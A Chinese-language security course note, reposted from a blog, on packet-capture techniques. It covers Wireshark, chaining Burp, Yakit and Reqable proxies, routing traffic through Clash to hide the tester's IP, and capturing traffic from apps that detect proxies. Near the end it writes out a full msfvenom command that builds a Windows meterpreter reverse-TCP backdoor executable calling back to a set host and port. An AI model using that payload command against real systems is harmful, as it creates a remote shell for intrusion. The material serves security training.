基础入门-抓包技术&全局协议&上网双层&多项目联动&网卡模式&检验绕过&移动应用
知识点:
1、抓包技术-HTTP/S双层代理-扶墙环境
2、抓包技术-HTTP/S上游下游-项目联动
3、抓包技术-全局协议-WireShark&科来
Wireshark:
https://www.wireshark.org/
网络封包分析软件。网络封包分析软件的功能是截取网络封包,并尽可能显示出最为详细的网络封包资料。Wireshark使用WinPCAP作为接口,直接与网卡进行数据报文交换。
科来网络分析系统:
https://www.colasoft.com.cn/
该系统具有行业领先的专家分析技术,通过捕获并分析网络中传输的底层数据包,对网络故障、网络安全以及网络性能进行全面分析,从而快速排查网络中出现或潜在的故障、安全及性能问题。
一、演示案例-抓包技术-Web&App&小程序&PC-扶墙双层
解决:
1、目标需要采用梯子才能访问
2、隐藏真实IP去访问并进行抓包
Clash+Burp
Clash+Yakit
二、演示案例-抓包技术-Web&App&小程序&PC-项目联动
意义:让一个数据包同时经过不同安全测试工具进行扫描
Burp->Yakit
1、Burp 127.0.0.1:8080
2、Yakit 127.0.0.1:8083
3、让Burp将流量给到Yakit
4、系统的代理设置:127.0.0.1:8080
Yakit->Burp
1、Yakit 127.0.0.1:8083
2、设置下游 127.0.0.1:8080
3、Burp 127.0.0.1:8080
4、系统的代理设置:127.0.0.1:8083
Burp->Yakit->Reqable
1、Burp 127.0.0.1:8080
2、Yakit 127.0.0.1:8083
3、Yakit设置下游 127.0.0.1:9000
4、让Burp将流量给到Yakit
5、系统的代理设置:127.0.0.1:8080
三、演示案例-抓包技术-Web&App&小程序&PC-全局协议
WireShark、科来网络系统
1、解决部分代理校验
有部分的app web 小程序 当设置了代理后无法抓包
校验:检测到了当前机器的代理设置 做了一个策略防止
做了代理的设置数据走向:本身应用-代理检测-从网卡出去(监听抓包工具就是用来监听网卡)
没有做代理的数据走向:本身应用-从网卡出去(代理是在网卡之前产生)
2、APP/小程序/PC应用
由于应用类型不同,不是说所有的应用都有https协议的数据
3、蓝队分析TCP/UDP应用
msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.1.9 lport=6666 -f exe -o 9.exe //生成一个TCP的MSF后门
原文地址:https://blog.csdn.net/m0_60571842/article/details/145164052
免责声明:本站文章内容转载自网络资源,如本站内容侵犯了原著者的合法权益,可联系本站删除。更多内容请关注自学内容网(zxcms.com)!